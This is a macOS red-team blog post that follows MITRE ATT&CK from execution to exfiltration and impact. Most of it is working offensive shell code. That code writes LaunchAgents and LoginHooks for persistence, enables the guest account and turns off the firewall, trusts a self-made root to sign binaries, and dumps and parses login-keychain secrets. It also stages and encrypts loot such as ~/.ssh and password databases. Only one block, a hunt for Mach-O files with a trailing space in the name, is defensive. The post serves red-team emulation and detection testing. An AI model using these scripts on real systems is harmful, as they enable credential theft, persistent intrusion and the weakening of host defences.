MacOS Red Teaming 208: macOS ATT&CK Techniques
Let's go over some popular macOS ATT&CK techniques. MITRE's ATT&CK has been super popular lately, and I would feel remiss if I were to end the series without covering at least one full kill chain, end to end. So let's kill two birds with one stone and use MITRE ATT&CK to guide us through some common macOS red team techniques. The idea here is to review a handful of common techniques and have them ready to go in gscript, giving us options at any stage of the game. This is absolutely not an exhaustive list: these are well-known attacker techniques, but there are likely many more in use that aren't listed here. Also, if you're doing threat emulation, remember that the ATT&CK entries often don't go into enough detail on the procedure; the framework is neither comprehensive nor deep, so try not to rely on any single framework for your emulation plan. I had to remove a few entries from this post because they simply didn't match up to the framework well enough. That said, these entries are still invaluable for detection testing, or even for sourcing ideas for new techniques.
We are going to go from left to right across the general life cycle of a kill chain. I'm going to skip the Initial Access tactic, as this is often just the access channel. In my experience on macOS, initial access is achieved through some type of social engineering, either more active and targeted like phishing, or more passive like a watering hole attack. This isn't particularly macOS-specific content, hence skipping it to save space in this post. So we are going to assume that the user was tricked into downloading the payload somehow, and start on Execution with that assumption in mind. Let's pick a few macOS-specific techniques along the kill chain and cover them in depth.
Space After Filename (T1151)
Execution
This is a pretty unique technique and macOS specific as far as I know. It masquerades the true file type by giving the file a fake extension and then appending a space to the name. Finder no longer matches the extension, so the OS falls back to the file's real type: send a Mach-O executable named "terminal.txt " (note the trailing space) and it runs, in a Terminal window, when the target double-clicks to "open the text file". Granted, the binary is still subject to Gatekeeper if it arrived carrying the quarantine attribute, so how it was downloaded and how it's signed still matter, and a filename that ends in whitespace is a trivial thing for defenders to hunt for.
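Since the trailing space is the whole tell, here is the hunt from the defender's side, as an added example that is not from the original post or its gscripts. It lists regular files whose name ends in a space and keeps only those whose first four bytes are a Mach-O or fat-binary magic; it assumes nothing beyond POSIX find, od and tr, and the quarantine check (macOS xattr) is optional.

```shell
# Added example, not from the original post: hunt for "space after filename"
# masquerades by pairing a whitespace-terminated name with a Mach-O magic.

is_macho() {
    # Compare the first four bytes against the thin (feedface / feedfacf, plus
    # their byte-swapped forms) and fat (cafebabe / bebafeca) magics.
    magic=$(od -An -tx1 -N4 "$1" 2>/dev/null | tr -d ' \n')
    case "$magic" in
        feedface|feedfacf|cefaedfe|cffaedfe|cafebabe|bebafeca) return 0 ;;
        *) return 1 ;;
    esac
}

is_quarantined() {
    # True when the file still carries the Gatekeeper quarantine flag (macOS only).
    xattr -p com.apple.quarantine "$1" >/dev/null 2>&1
}

find_space_suffixed_machos() {
    # $1: directory to sweep (e.g. ~/Downloads). Prints one matching path per line.
    # IFS= and -r keep the trailing space that is the whole point of the technique.
    find "$1" -type f -name '* ' -print 2>/dev/null | while IFS= read -r f; do
        if is_macho "$f"; then
            printf '%s\n' "$f"
        fi
    done
}

# Attacker side, for reference: cp ./payload "Report.txt " puts the Mach-O under a
# .txt-looking name; a double-click in Finder runs it in Terminal, still subject
# to Gatekeeper if the quarantine xattr is set on the copy.
```

Run it over a user's Downloads and Desktop after an incident, or periodically; the byte-magic check keeps a genuinely stray "notes.txt " out of the results.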
Launchctl Persistence (T1152)
Execution / Persistence
This is one of my favorite macOS persistence techniques because of how easy it is to use. launchctl is the command-line front end to launchd, which manages every service on the box, Launch Agents and Launch Daemons included; besides loading a plist you wrote, launchctl submit will hand launchd a one-off command with no plist at all. Here is a helpful gscript to do exactly that. It's a quick one-liner and gives you some robust persistence; just remember that a submitted job lives only until reboot, so anything that must survive a restart should be backed by a plist in a LaunchAgents or LaunchDaemons directory.
Re-Opened Applications (T1164)
Persistence
Literally "Apple persistence": the com.apple.loginwindow plist controls what happens when the login window fires, including which applications get re-opened. I've always called this LoginHook persistence, as LoginHook is the key I set in that plist, and the script it names runs as root at every login. (Strictly speaking, ATT&CK files the LoginHook key under Logon Scripts, T1037, and T1164 covers the per-host com.apple.loginwindow.<UUID>.plist under ~/Library/Preferences/ByHost that records which apps to re-open; either way, you get code at login.) Here is a gscript that does this technique using the defaults command.
Plist Modification (T1150)
Defense Evasion / Persistence / PrivEsc
This is one of those "techniques" that is extremely common to both legitimate and malicious applications. I go into plists in more depth in my first OS X forensics post. One shortcut I've since adopted is the defaults command, which edits a single value in a plist without reformatting or rewriting the whole file (and handles the binary plist format for you). Truth be told, it's hard to detect this technique on its own; it's usually used in conjunction with another technique, such as a persistence or host-weakening technique, and that is where detections should focus. I have a few gscript examples of this, like using the defaults command in gscript to enable the guest user or disable the firewall.
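The three persistence entries above (launchctl, the loginwindow plist, and plist edits via defaults) all come down to the same few commands, so here they are in one place as an added example. This is not the post's gscript: the LaunchAgent plist is written with a heredoc so the helper runs anywhere, while launchctl, plutil and defaults only fire on macOS. The label, program path and interval are placeholders.

```shell
# Added example, not the post's gscript: persistence through a user LaunchAgent
# (survives reboot), the plist-free launchctl submit one-liner, and the defaults
# edits the post refers to.

write_launch_agent() {
    # $1 label (reverse-DNS), $2 program to run, $3 interval in seconds (default 300).
    # Prints the path of the plist it wrote.
    label=$1; program=$2; interval=${3:-300}
    dir=$HOME/Library/LaunchAgents
    mkdir -p "$dir"
    plist=$dir/$label.plist
    cat > "$plist" <<EOF
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key><string>$label</string>
    <key>ProgramArguments</key>
    <array><string>$program</string></array>
    <key>RunAtLoad</key><true/>
    <key>StartInterval</key><integer>$interval</integer>
</dict>
</plist>
EOF
    chmod 644 "$plist"
    printf '%s\n' "$plist"
}

load_launch_agent() {
    # Lint first: launchd silently ignores a malformed plist. Then load it (-w also
    # clears any Disabled override). Both tools are macOS only, so skip elsewhere.
    if command -v plutil >/dev/null 2>&1; then
        plutil -lint "$1" >/dev/null || return 1
    fi
    if command -v launchctl >/dev/null 2>&1; then
        launchctl load -w "$1"
    fi
}

submit_one_off() {
    # T1152 without a plist: launchd runs $2 under label $1 and keeps it alive
    # until reboot or `launchctl remove $1`. Not persistent across reboots.
    command -v launchctl >/dev/null 2>&1 || return 0
    launchctl submit -l "$1" -- "$2"
}

defaults_edits() {
    # T1150 via defaults (needs root, macOS only): $1 is a script to run as root at
    # every login (LoginHook); the other two enable the guest account and turn the
    # application firewall off. Check with: defaults read <domain> <key>.
    command -v defaults >/dev/null 2>&1 || return 0
    sudo defaults write com.apple.loginwindow LoginHook "$1"
    sudo defaults write /Library/Preferences/com.apple.loginwindow GuestEnabled -bool true
    sudo defaults write /Library/Preferences/com.apple.alf globalstate -int 0
}
```

Typical use is `load_launch_agent "$(write_launch_agent com.example.updater /path/to/payload 300)"`; the plist then shows up in `launchctl list` under its label, which is also the first thing a responder will grep for.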
Install Root Certificate (T1130)
Defense Evasion
This is one of those techniques that, while it can be performed on most major operating systems, has a particular payoff on macOS: once your root is in the keychain trust store, anything that chains to it (a certificate you then use for code signing, or the TLS interception you stand up) looks legitimate to the user and to tools that consult the keychain. One caveat: Gatekeeper itself only honors Developer ID certificates issued by Apple, so a self-made root gets you past codesign verification and user-facing trust prompts, not past spctl. You can use the security CLI tool (security add-trusted-cert) to add certificates directly, or you can push them with a configuration profile. Sometimes these techniques chain together, such as installing a root certificate and then using it to code sign your later binaries.
Code Signing (T1116)
Defense Evasion
Another universal technique; one of my first macOS red teaming posts covers code signing in depth, as well as the certificate-adding technique above. I like to sign my compiled gscripts to give them that extra air of authenticity, albeit usually with a throwaway self-signed certificate. All that said, using a legitimate Apple Developer ID code signing certificate (and, on 10.15 and later, notarizing the binary) is the best way to beat Gatekeeper, and is highly suggested if you can afford it.
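The root-certificate and code-signing entries above chain together, so here is that chain end to end as an added example (not the post's own tooling): mint a throwaway self-signed code-signing certificate with openssl, trust it and import its key into the login keychain, sign a binary, then ask Gatekeeper what it thinks of the result. The openssl steps run on any system; security, codesign and spctl only exist on macOS. Paths and the common name are placeholders, and the script assumes an OpenSSL 1.1+ or LibreSSL `openssl`.

```shell
# Added example, not from the post: throwaway signing cert -> keychain trust ->
# codesign -> spctl assessment.

make_signing_cert() {
    # $1 output directory, $2 common name. Writes key.pem and cert.pem, prints cert.pem.
    out=$1; cn=$2
    mkdir -p "$out"
    # extendedKeyUsage=codeSigning is what makes codesign accept this identity.
    cat > "$out/req.cnf" <<EOF
[req]
distinguished_name = dn
x509_extensions = v3
prompt = no
[dn]
CN = $cn
[v3]
keyUsage = critical,digitalSignature
extendedKeyUsage = critical,codeSigning
basicConstraints = critical,CA:FALSE
EOF
    openssl req -x509 -newkey rsa:2048 -nodes -days 365 -config "$out/req.cnf" \
        -keyout "$out/key.pem" -out "$out/cert.pem" 2>/dev/null
    printf '%s\n' "$out/cert.pem"
}

trust_and_import() {
    # macOS only. T1130: mark cert.pem trusted for the codeSign policy in the login
    # keychain (add -d and the System keychain to do it admin-wide), then import the
    # private key and let codesign use it without a prompt.
    command -v security >/dev/null 2>&1 || return 0
    kc=$HOME/Library/Keychains/login.keychain-db
    security add-trusted-cert -r trustRoot -p codeSign -k "$kc" "$1/cert.pem"
    security import "$1/key.pem" -k "$kc" -T /usr/bin/codesign
}

sign_and_assess() {
    # macOS only. T1116: sign $1 with the identity named $2, verify the signature,
    # then run the Gatekeeper assessment. Expect "rejected" here: spctl only accepts
    # Apple-issued Developer ID (and, on 10.15+, notarized) signatures.
    command -v codesign >/dev/null 2>&1 || return 0
    codesign --force --sign "$2" "$1"
    codesign --verify --verbose=2 "$1"
    spctl --assess --type execute --verbose "$1" || true
}
```

The interesting output is the last line: `codesign --verify` passes once the root is trusted, while `spctl --assess` still says rejected, which is exactly the gap between "looks signed" and "passes Gatekeeper" that the text above describes.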
Credential Dumping (T1003)
Credential Access
This is another universal technique, often involving dumping memory and looking for stored credentials in specific processes or files. Oddly, the MITRE ATT&CK page doesn't list any macOS-specific procedures, despite the technique appearing in the macOS ATT&CK matrix. That said, I talked about dumping memory and finding / cracking the keychain file back in the day.
Keychain (T1142)
Credential Access
This is one of my favorite ways to dump stored credentials on macOS. Even without root-level access you can see what credentials are saved, giving you an idea of other systems you could pivot to. Simply run security dump-keychain -d login.keychain (on 10.12 and later the file is ~/Library/Keychains/login.keychain-db; sudo doesn't help here, as it's the user's keychain and the user's password that unlock it) to dump some creds. Without -d you get item metadata (accounts, services, servers) with no prompts; with -d each secret raises an Allow/Deny dialog unless the item already trusts the security tool, so on a real target expect the user to notice. You can also export / copy the keychain files off the host, but you will need the keychain password to decrypt them. That said, modern EDR systems often flag odd processes touching these keychain files.
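For both credential-access entries above, the painful part is reading the dump, which is several lines of attributes per item. Here is an added example (not from the post) that runs the dump and reduces it to one line per item. The sample dump is constructed to mirror the real format, one generic password and one internet password, so the parser can be exercised off a Mac; the attribute tags it keys on (acct, svce, srvr, data) are the real ones.

```shell
# Added example, not from the post: dump the login keychain and flatten
# `security dump-keychain` output to class / account / where / secret.

dump_login_keychain() {
    # macOS only. Without -d you get metadata (class, account, service) with no
    # prompts; pass any argument to add -d, which shows secrets under "data:" but
    # raises one Allow/Deny dialog per item unless the item already trusts `security`.
    command -v security >/dev/null 2>&1 || return 0
    kc=$HOME/Library/Keychains/login.keychain-db
    [ -f "$kc" ] || kc=$HOME/Library/Keychains/login.keychain
    security dump-keychain ${1:+-d} "$kc"
}

parse_keychain_dump() {
    # stdin: dump-keychain output. stdout: class TAB account TAB service-or-server TAB secret
    # ("-" when the dump was taken without -d or access to the item was denied).
    awk '
        function val(line,   s) { s = line; sub(/^[^=]*=/, "", s); gsub(/"/, "", s); return s }
        function flush() {
            if (cls != "") printf "%s\t%s\t%s\t%s\n", cls, acct, where, secret
            cls = ""; acct = "-"; where = "-"; secret = "-"
        }
        /^class: /       { flush(); cls = $2; gsub(/"/, "", cls) }
        /"acct"<blob>=/  { acct  = val($0) }
        /"svce"<blob>=/  { where = val($0) }   # generic password: service name
        /"srvr"<blob>=/  { where = val($0) }   # internet password: server
        /^data:/         { if ((getline line) > 0) { secret = line; gsub(/^"|"$/, "", secret) } }
        END              { flush() }
    '
}

sample_dump() {
    # Constructed sample in the shape of `security dump-keychain -d`; not real data.
    cat <<'EOF'
keychain: "/Users/alice/Library/Keychains/login.keychain-db"
version: 512
class: "genp"
attributes:
    0x00000007 <blob>="Slack"
    "acct"<blob>="alice@example.com"
    "cdat"<timedate>=0x32303139313030313132303030305A00  "20191001120000Z\000"
    "desc"<blob>=<NULL>
    "svce"<blob>="Slack"
data:
"hunter2"
class: "inet"
attributes:
    0x00000007 <blob>="vpn.example.com"
    "acct"<blob>="alice"
    "ptcl"<uint32>="htps"
    "srvr"<blob>="vpn.example.com"
data:
"s3cret"
EOF
}
```

On a target, `dump_login_keychain | parse_keychain_dump` gives the quiet metadata-only view of where the user has accounts; `dump_login_keychain -d | parse_keychain_dump` adds the secrets at the cost of the dialogs.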
File and Directory Discovery (T1083)
Discovery
While this is another universal technique, there are macOS-specific commands here that speed up the process. One of my favorite tricks is the mdfind command-line utility, which queries the data Spotlight has already indexed (file names, metadata, and even file contents). This means you won't be spiking the CPU with a huge grep / find over the disk, which is also a lot quieter.
System Network Connections Discovery (T1049)
Discovery
The real bread and butter of the Discovery tactic is network reconnaissance. While this is a universal technique, macOS ships a few common utilities for tracking down active network connections and neighbors, such as w, arp, netstat, and lsof. One of the cool macOS-specific commands for viewing network information is dns-sd, which leverages Bonjour (multicast DNS service discovery) to find the services other hosts are advertising. For example, to browse for machines on the network with Remote Apple Events enabled, you can run dns-sd -B _eppc._tcp (it keeps browsing until you Ctrl-C it).
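Here are both discovery tricks above wrapped as helpers, as an added example that is not from the post. spotlight_find goes through the Spotlight index via mdfind when it exists (no disk walk) and falls back to find elsewhere, so the same helper works from a Linux jump box; bonjour_sweep browses a handful of service types that matter for pivoting and kills each browse after a timeout, since dns-sd never exits on its own. The service-type list and the timeout are my own choices.

```shell
# Added example, not from the post: Spotlight-backed file discovery and a
# Bonjour service sweep, each degrading gracefully off macOS.

spotlight_find() {
    # $1 root directory, remaining args: filename globs (case-insensitive under mdfind).
    root=$1; shift
    for pat; do
        if command -v mdfind >/dev/null 2>&1; then
            mdfind -onlyin "$root" "kMDItemFSName == '$pat'c"
        else
            find "$root" -name "$pat" -print 2>/dev/null
        fi
    done
}

spotlight_grep() {
    # Content search straight from the index: files whose indexed text contains $1
    # under $2 (default: the home directory). Prints nothing without mdfind.
    command -v mdfind >/dev/null 2>&1 || return 0
    mdfind -onlyin "${2:-$HOME}" "kMDItemTextContent == '*$1*'cd"
}

bonjour_sweep() {
    # Each browse gets $1 seconds (default 3). _eppc = Remote Apple Events,
    # _rfb = Screen Sharing, _afpovertcp / _smb = file shares.
    secs=${1:-3}
    command -v dns-sd >/dev/null 2>&1 || return 0
    for svc in _eppc._tcp _ssh._tcp _rfb._tcp _smb._tcp _afpovertcp._tcp; do
        printf '## %s\n' "$svc"
        dns-sd -B "$svc" & pid=$!
        sleep "$secs"
        kill "$pid" 2>/dev/null || true
        wait "$pid" 2>/dev/null || true
    done
}

active_connections() {
    # Established TCP sessions with the owning process: lsof on macOS, ss elsewhere.
    if command -v lsof >/dev/null 2>&1; then
        lsof -nP -iTCP -sTCP:ESTABLISHED
    else
        ss -tnp state established
    fi
}
```

`spotlight_find "$HOME" '*.kdbx' 'id_rsa' '*.pem'` is a typical first pass; `spotlight_grep password` is the one that would have cost minutes of grep on a large home directory.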
AppleScript (T1155)
Execution / Lateral Movement
AppleScript is a very Apple- and macOS-specific feature, tying deeply into the Apple Events IPC mechanism. Speaking of Remote Apple Events: to take practical advantage of that service for lateral movement, one needs to leverage AppleScript against a machine that has Remote Apple Events enabled in its Sharing preferences (it listens on TCP 3031). The ATT&CK page again doesn't list any specific macOS procedures; that said, I have an entire blog post on getting practical lateral movement out of this service. Granted, like most lateral movement techniques, this requires valid credentials on the remote system.
Key Logger (T1056)
Collection
Another universal technique, but key logging is so classic it really can't be avoided. I have a sample gscript here, which really just wraps an old key logger. It's simple stuff, but it's wildly effective for picking up sensitive information or new credentials.
Command and Control . . .
I'm also skipping Command and Control for now, as that will be largely covered in my next post, a deep dive on some of the best macOS RATs / trojans currently available. I plan on focusing less on novel command and control channels and more on the features offered by the various command and control frameworks. I'm looking forward to it!
Data Compressed (T1002)
Data Encrypted (T1022)
Exfiltration
This is a very classic set of universal techniques: the attacker stages, compresses, and encrypts some data before exfiltrating it in some manner. I built a cross-platform tool around this very set of functions, because as a red teamer you do it so often in so many different contexts. GoRedLoot is that specially designed tool for exactly this purpose. Later I refactored it to be usable directly from gscript as the gloot library; here's an example gscript using the gloot library.
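When you can't drop a tool, the same stage / compress / encrypt step can be done with what is already on the box. The following is an added example, not GoRedLoot or gloot: tar and gzip for T1002, openssl enc with a PBKDF2-derived AES key for T1022, plus a SHA-256 manifest so the operator can prove nothing was altered in transit. It assumes an openssl whose enc supports -pbkdf2 (OpenSSL 1.1.1+; the macOS system LibreSSL may not, in which case point at a Homebrew openssl). Paths are placeholders and the password comes from $LOOT_PASS so it never appears in argv.

```shell
# Added example, not the post's tooling: stage, hash, compress and encrypt loot
# with tar / gzip / openssl, and the matching unpack-and-verify step.

sha256_of() {
    # Linux coreutils vs. the macOS perl wrapper; same output format, same -c flag.
    if command -v sha256sum >/dev/null 2>&1; then sha256sum "$@"; else shasum -a 256 "$@"; fi
}

stage_loot() {
    # $1 staging directory, rest: files or directories to copy in. Missing sources
    # are skipped silently (a collection list is usually speculative). Ends by
    # writing MANIFEST.sha256 over everything staged.
    stage=$1; shift
    mkdir -p "$stage"
    for src; do
        if [ -e "$src" ]; then cp -R "$src" "$stage/"; fi
    done
    ( cd "$stage" && find . -type f ! -name MANIFEST.sha256 -print | sort |
        while IFS= read -r f; do sha256_of "$f"; done > MANIFEST.sha256 )
}

pack_loot() {
    # $1 staging dir, $2 output file. tar -> gzip -> AES-256-CBC keyed via PBKDF2
    # from $LOOT_PASS. CBC gives confidentiality only; the manifest covers integrity.
    tar -C "$1" -cf - . | gzip -9 |
        openssl enc -aes-256-cbc -salt -pbkdf2 -iter 200000 -pass env:LOOT_PASS -out "$2"
}

unpack_loot() {
    # $1 encrypted file, $2 destination dir. Reverse of pack_loot, then verify the
    # manifest so a corrupted or tampered archive fails loudly.
    mkdir -p "$2"
    openssl enc -d -aes-256-cbc -pbkdf2 -iter 200000 -pass env:LOOT_PASS -in "$1" |
        gzip -dc | tar -C "$2" -xf -
    ( cd "$2" && sha256_of -c MANIFEST.sha256 >/dev/null )
}
```

Usage on the target is `stage_loot /tmp/.s ~/.ssh ~/Documents/*.kdbx && LOOT_PASS=... pack_loot /tmp/.s /tmp/.s.bin`; the resulting blob is what gets moved over whatever channel you have, and `unpack_loot` on your side both decrypts it and re-checks the manifest.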
Data Destruction (T1485)
Impact
Finally, while I don't recommend data destruction in the majority of cases, one can't deny its impact and recent prevalence. This is another classic, universal technique, so much so that I made another tool to experiment with the idea of data destruction in a cross-platform way. That tool is GoRedDeath, although be careful using it, as it is very experimental and destructive.
Now that we've covered some common and interesting macOS-specific techniques, let's rapid-fire through a few more available macOS ATT&CK gscripts. These come with no description other than the MITRE page and the code itself, for brevity. If you have questions or want me to elaborate on a specific technique, feel free to use the comments section:
Backdoor histcontrol (T1148) - gscript
Cron Persistence (T1168) - gscript
Launch Agent Persistence (T1159) - gscript
Launch Daemon Persistence (T1160) - gscript
Trap Persistence (T1154) - gscript
Grab Clipboard (T1115) - gscript
Enabling SSH (T1021) - gscript
Clear History (T1146) - gscript
Screen Capture (T1113) - gscript
And there are always more techniques on my gscript OS X page that don't fit any exact ATT&CK technique. If you're still looking for even more ideas for red team / pentest techniques on macOS, check out this presentation, which is chock full of different, real-world techniques.